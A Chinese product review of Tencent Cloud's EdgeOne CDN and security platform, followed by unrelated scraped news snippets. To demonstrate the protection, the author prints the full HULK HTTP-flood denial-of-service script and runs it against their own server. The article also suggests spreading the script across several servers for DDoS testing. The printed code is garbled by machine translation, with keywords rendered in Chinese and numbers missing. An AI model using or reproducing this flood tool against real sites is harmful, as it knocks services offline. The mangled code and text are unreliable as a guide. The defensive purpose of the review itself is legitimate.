首页 > 网络技术迭代 > 内容

腾讯EdgeOne产品评测体验——腾讯云Edgeone保护我的网站

发布于：2024-10-24 编辑：匿名来源：网络

前言众所周知，一个网站如果没有安全防护，极易受到恶意攻击，导致运行受阻甚至瘫痪。为保证网站安全稳定运行，必须采取CDN加速、DDoS防护等措施，为用户提供安全可靠的服务。

本文将基于腾讯云边缘安全加速平台，介绍网站接入CDN和DDoS防护的重要性、实现方法和最佳实践，为大家提供有价值的参考。边缘安全加速平台简介边缘安全加速平台全称是腾讯云EdgeOne，简称EO（以下简称EdgeOne）。

通过一张图片了解 EdgeOne 是什么。如图所示，当用户向源站发起请求时，EdgeOne将依托腾讯边缘计算节点为网站提供全面的边界防护，包括DDOS防护、CC防护、WEB安全防护、BOT安全防护等。

不仅如此，还为用户提供网站加速服务，通过全面的安全防护和加速功能，为用户的网站提供强有力的支持和保护。简单来说，EdgeOne就是CDN和高仿服务器的结合体。

更详细的介绍可以去官方网站。模拟网站被攻击。

在网站连接EdgeOne之前，先模拟被攻击，看看被攻击的服务器的状态。攻击脚本在此准备攻击脚本。

该脚本是一个简单的HTTP请求攻击脚本。它使用多个线程向指定URL发送大量HTTP请求，试图对目标服务器造成拒绝服务（DoS）攻击。

（仅用于学习和教育目的，不应用于任何非法或不道德的活动。）代码语言：javascript复制import urllib2import sysimport threadingimport randomimport re#global paramsurl=''host=''headers_useragents=[]headers_referers=[]request_counter=0flag=0safe=0def inc_counter(): global request_counter request_counter+=1def set_flag(val) : global flag flag=valdef set_safe(): global safe safe=1 # 生成用户代理 arraydef useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9 .1.3) Gecko/Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/Firefox/3.5.3 (.NET CLR 3.5。

9)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/Firefox/3.5.3 (.NET CLR 3.5.9)') headers_useragents.附加('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/Firefox/3.5.1') headers_useragents.append('Mozilla/5.0 (Windows;你； Windows NT 5.1； en-US) AppleWebKit/.1（KHTML，如 Gecko）Chrome/4.0..6 Safari/.1') headers_useragents.append('Mozilla/4.0（兼容；MSIE 8.0；Windows NT 6.1；WOW64；Trident/4.0； SLCC2; .NET CLR 2.0.7; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (兼容; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.7; .NET CLR 1.1 .; .NET CLR 3.5.9; .NET CLR 3.0.9)') headers_useragents.append('Mozilla/4.0 (兼容; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append( 'Mozilla/4.0（兼容；MSIE 8.0；Windows NT 5.1；Trident/4.0；SV1；.NET CLR 2.0.7；InfoPath.2）') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (兼容; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22版本/10.51') return(headers_useragents)# 生成引用数组defreferer_list(): global headers_referers headers_referers.append(' headers_referers.append(' headers_referers.append(' headers_referers.append(' + host + '/') return(headers_referers) #构建随机ascii stringdef buildblock (size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str)def use(): print '---- - - - - - - - - - - - - - - - - - - - - - - - -' 打印 '用法： python hulk.py ' print '可以在url后添加“safe”，以在dos' print '后自动关闭------------------------ --------------------------' #http requestdef httpcall(url): useragent_list()referer_list() code=0 if url. count("?")>0: param_joiner="&" else: param_joiner="?" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('用户代理', random.choice(headers_useragents)) request.add_header('缓存控制', '无缓存') request.add_header('Accept-Charset', 'ISO-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint) (5,10))) request.add_header('Keep-Alive', random.randint(,)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) 尝试： urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print 'Response Code' code= except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter( ) urllib2.urlopen(request) return(code) #http调用者线程 class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==) & (安全==1): set_flag(2) except Exception, ex: pass# 监控http线程并计数请求class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previousrequest_counter): print "%d Requests Sent" % (request_counter) previous=request_counter if flag==2: print "\n-- HULK Attack Finished --"#execute if len(sys.argv) < 2: 用法() sys.exit()else: if sys.argv[1]=="help": use() sys.exit() else: print "-- HULK Attack Started --" if len(sys.argv)= = 3: if sys.argv[2]=="safe": set_safe() url = sys.argv[1] if url.count("/")==2: url = url + "/" m = re .search('http\://([^/]*)/?.*', url) host = m.group(1) for i in range(): t = HTTPThread() t.start() t = MonitorThread() t.start() 攻击脚本执行。执行脚本目录下的python hulk.py。

可以看到，在没有任何保护的情况下，第二批请求此时就可以让网站崩溃，直接返回到我的服务器上。监控是这样的。

快速将您的网站连接到 EdgeOne。接下来，将您的网站连接到EdgeOne，以达到安全加速的效果。

以下是访问步骤。前提条件（注意事项）在连接EdgeOne之前，有两点需要注意：必须先注册域名，否则无法访问。

如果没有注册，请前往域名注册机构。注册时间约为10至15天。

如果是阿里云域名，需要到阿里云域名解析办公室将DNS修改为腾讯云。然后进入Cloud DNS添加EdgeOne的DNS解析记录。

一定要注意！！！添加站点进入EdgeOne控制台后添加站点，如下图。输入站点名称并填写域名。

选择EdgeOne套餐，这里已经购买了，所以直接选择。接下来选择加速区域和访问模式。

这里加速区域选择【全球可用区】，访问方式选择CNAME访问。最后在域名解析中添加DNS解析，验证完成。

添加加速域名。添加站点后，可以添加加速域名。

完成此步骤后，域名将成功连接到EdgeOne，您的网站将受到EdgeOne的保护。完整步骤如下： 1. 进入要添加域名的站点。

2. 配置域名。这里简单说明一下配置项：加速域名：填写域名对应的主机记录值。

例如：当前要添加的加速网站是www.example.com，填写www即可。源站配置：配置您的服务器IP。

IPv6接入：根据您的需求进行配置。回源协议：根据自己的需求进行配置。

回原点端口：根据自己的需求进行配置。配置：在此步骤中，将根据您选择的配置添加【规则引擎】。

您也可以跳过此步骤并稍后添加。最后将解析记录添加到云解析DNS中，如下图配置。

使用免费证书部署域名 Edge安全加速平台EO 使用免费证书部署EdgeOne域名 - 域名服务 - 文档中心 - 腾讯云免费HTTPS证书是广大开发者和个人站长关注的焦点之一今天。在当今的互联网环境下，HTTPS访问已经成为现代网站的必备功能之一。

如果网站不启用HTTPS，不仅会影响网站的安全，还会降低搜索引擎排名。因此，在创建个人博客时，您需要为您的域名申请SSL证书，以实现HTTPS访问。

虽然申请SSL证书的方式有很多种，但传统的申请和部署方式往往比较繁琐，而且免费证书通常有过期限制，需要定期手动更新。如果您当前网站尚未购买HTTPS证书，且加速域名不包含通用域名，您可以申请免费证书来测试是否支持HTTPS访问。

注意：免费证书由免费 SSL/TLS 证书颁发机构 Let's Encrypt 颁发。如果您的网站目前是NS访问的，您可以申请泛域名证书。

如果当前是CNAME访问，EdgeOne仅支持申请单个域名证书。不支持申请泛域名证书。

证书有效期为3个月。到期前平台会自动申请续订，无需您手动更新。

如果您当前使用的是NS访问，并切换为CNAME访问，您申请的扩展域名证书到期后将不会自动续订。免费证书不支持下载。

如果域名是通过CNAME方式访问的，您仍需要完成CNAME配置并等待CNAME状态生效后，才能为该域名申请免费SSL证书。 EdgeOne的免费HTTPS证书功能大大简化了这一过程，提供一键申请和自动续订服务，无需手动更新和完全自动化管理。

快速启用HTTPS访问。申请免费证书只需几个简单的步骤。

以下为EdgeOne申请并部署免费证书的步骤：登录登录-腾讯云，通过站点列表选择需要配置的站点，进入站点管理二级菜单。在左侧导航栏中，单击域名服务 > 域名管理。

在域名管理页面，选择需要配置证书的域名，单击HTTPS栏中的编辑，弹出HTTPS证书配置。选择申请免费证书后，单击“确定”，完成免费证书的申请和安装。

部署完成后，您可以将鼠标悬停在域名管理列表页面配置的图标上，显示当前部署的证书信息。 EdgeOne安全防护现在，将网站连接到EdgeOne后，我们看看它是否可以保护我们免受恶意攻击。

CC攻击防护再次执行python hulk.py来攻击服务器。此时，您将看到EdgeOne控制台上显示的访问数据。

这里我们以CC保护为例进行设置。 EdgeOne的默认配置比较宽松。

由于我的服务器配置较低，所以需要进行一些配置才能达到防护效果。这里我把它设置为紧急。

当客户端请求超过40次/10秒时，可以实施紧急保护。这时，如果再次执行该脚本，就会发现网站有了保护作用。

如下图所示，具备DDos攻击防护条件的用户可以将攻击脚本分发到多台服务器上进行DDos测试。自定义保护规则 EdgeOne还支持自定义保护配置，例如配置访问IP黑白名单、Referer黑名单、UA黑白名单或地域限制。

我们可以根据自己的需要进行配置，简单明了。例如，我们可以禁止我们刚刚保护的客户端IP。

如下所示，当我再次执行脚本时，会返回相应的错误代码。还有各种自定义配置的详细说明，可以在边缘安全加速平台EO > 安全防护 > Web 防护 > 自定义规则中找到。

OWASP 保护此外，EdgeOne 还默认提供包括 OWASP top10 在内的托管规则。可以有效防御SQL注入、XSS攻击、webshel??l上传、命令注入等攻击。

比如我现在在浏览器地址中输入一个JS脚本进行XSS攻击，可以看到EdgeOne直接帮我们拦截了。在控制台也可以看到相关的拦截记录。

EdgeOne体验经过这次实践，EdgeOne给我留下了以下深刻的感受： EdgeOne实现的一体化安全防护和加速功能，显着提升了产品性能和用户接受度。企业不再需要购买CDN、DDoS等独立服务，大大简化了企业的选型和部署流程。

在配置方面，EdgeOne提供了整个站点的一键配置。用户通过简单的操作即可实现全局配置，无需繁琐的手动设置，极大简化了配置流程，提高了用户使用产品的易用性。

性别。我特别关注了EdgeOne的计费模式，发现EdgeOne在计费方面有一定的优势，比如“干净流量”的计费模式。

也就是说，未来网站安全防护和加速的成本将大大降低。总结在数字时代，网络安全已成为至关重要的任务，尤其是保证网站安全稳定运行。

依托EdgeOne一体化加速与安全防护解决方案，我们可以快速构建全面、高效的网站安全防护体系。花两三百块钱，就可以体验CC/WAF/限速等高级安全能力，相当不错了。

您还可以部署具有自动续订功能的证书。 EdgeOne是一款非常良心的产品。

有兴趣的朋友可以点击链接了解更多。

站长声明

标签：

上一篇：腾讯云部署雷驰Web应用防火墙（WAF）的安装和使用体验

下一篇：微信月活跃用户突破10亿，其安全性谁能支撑？

FLYPRO飞豹携XEagle无人机亮相2016全球最大无人机展AUVSI XPONENTIAL

FLYPRO飞豹携旗下XEagle无人机亮相2016年全球最大无人机展AUVSI - 5日在美国路易斯安那州新奥尔良举行，XPONENTIAL是全球规模最大、最专业的无人机展，也是机器人领域首屈一指的全球顶级专业盛会技术市场，吸引了全球众多行业领先企业的参与。（FLYPRO无人机展位）作为全球智

06-18
赛维尔生物科技获数千万元A轮融资

投资圈（微信ID：pedaily）据7月3日消息，武汉赛维尔生物科技有限公司近日获得来自投资界的数千万元A轮融资天堂硅谷集团旗下基金独家投资，本轮融资将用于加速公司的产品研发和市场拓展。资料显示，赛维尔生物成立于2007年，总部位于光谷生物城生物医药园。是一家实验服务和

06-17
青岛高新区工委委员、管委副主任张建军一行到访合肥启迪科技城

青岛高新区工委委员、管委会副主任张建军一行莅临合肥启迪科技园青岛高新区微信ID gh_ecda6b45ee21关于专题启迪之星（青岛高新区）由青岛高新区与青岛高新区共同打造启迪控股东北亚总部。围绕青岛高新区特色产业集群需求，帮助青岛高校师生创新创业和科技成果转化。创建有影

06-17
英飞凌：在华新投资扩建无锡生产线

11月6日，德国半导体科技公司英飞凌在第三届中国国际进口博览会上公布了在华最新投资计划。公司决定扩建无锡生产线工厂的IGBT模块生产线。 IGBT是指绝缘栅双极型晶体管。具有高频、高电压、大电流、易开关等优良特性。它是能量转换和传输的核心装置。被业界誉为功率变换器

06-06
MOOVED完成数千万元Pre-A轮融资，打造非洲本土家电品牌

投资界（ID：pedaily）据5月5日消息，非洲家电企业MOOVED近期完成数千万元融资人民币Pre-A轮融资。本轮融资由普尔曼资本领投。本轮新募集资金将用于产品研发、中国和非洲市场人才团队扩充以及品牌投资和线下渠道拓展。据悉，MOOVED今年4月完成天使轮融资。 “MOOVED成立于

06-18
通信芯片设计商纽瑞芯完成天使轮融资

据投资界2月28日消息，通信芯片设计商深圳纽瑞芯科技有限公司（以下简称“纽瑞芯”）宣布成功完成天使轮融资。本轮融资由新云创投领投，资金将主要用于公司射频和模拟混合芯片技术平台的研发和迭代，以及5G和5G两大关键技术的产业化。物联网通信定位芯片、5G射频天线智能调

06-18
贺利氏电化（上海）有限公司新电子化学品项目奠基

据上海化学工业区官方微信公众号消息，贺利氏电化（上海）有限公司新电子化学品项目奠基仪式隆重举行。 “新型电子化学品项目”在上海化学工业区召开。贺利氏电子化学材料事业部全球联席总裁Bernd Stenger表示，新项目的实施体现了贺利氏坚定的“在中国，为中国”的战略。

06-06
易居与克而瑞达成合并协议，收购价格提升至每股1.75美元

易居（中国）控股有限公司与中国房地产信贷有限公司达成合并协议计划收购全部流通股北京时间12月28日消息，易居（中国）控股有限公司当天宣布，与中国房地产信息公司达成合并协议及方案。集团与中国房地产信息（中国）控股有限公司。根据合并协议，易居将收购中房信贷全部流

06-18
科沃斯Smart Move技术产品亮相广州

科沃斯智动科技产品在广州亮相 2020年3月17日，科沃斯扫地机器人地宝9系列媒体品鉴会在广州贝塔咖啡举行。科沃斯讲解了其Smart Navi全局规划技术，并现场展示了搭载该技术的DR95扫地机器人。这项技术开发了机器人的视觉，让机器人能够自主检测和记忆环境，构建地图，先规划

06-17
特斯拉应该像他一样，监督司机在自动驾驶时的行为

上周五，特斯拉的电动车在自动驾驶模式下遭遇车祸，引起了全世界的关注。特斯拉随后官方宣布，这个自动驾驶功能并不能完全控制汽车。驾驶员必须用手握住方向盘并保持警惕并与汽车系统进行交互。这一事件再次提醒世人关注当前无人驾驶汽车的安全问题。目前，无人驾驶技术

06-18
商汤科技上市首日股价大涨7.27%，总市值近1400亿港元

上头条几经波折，12月30日，国内人工智能巨头商汤集团有限公司上市。（.HK）终于在香港联交所上市。首日收盘价为4.13港元，较发行价上涨7.27%。商汤科技总市值为1亿港元。同日，商汤在上海和香港同时举行上市庆祝仪式。仪式期间，商汤特地利用AR技术创新打造了“AR敲锣”

06-18
挚文集团2022年Q4净营收32.127亿元，净利润4.879亿元

北京时间3月16日，挚文集团（纳斯达克股票代码：MOMO）公布未经审计的第四季度及全年财务业绩。财报显示，今年第四季度，挚文集团净营收达到32亿元人民币（约合4亿美元）。不按照美国通用会计准则计算，归属于挚文集团的净利润为4亿元人民币（约合1万美元）。 ; 。据彭博社

06-17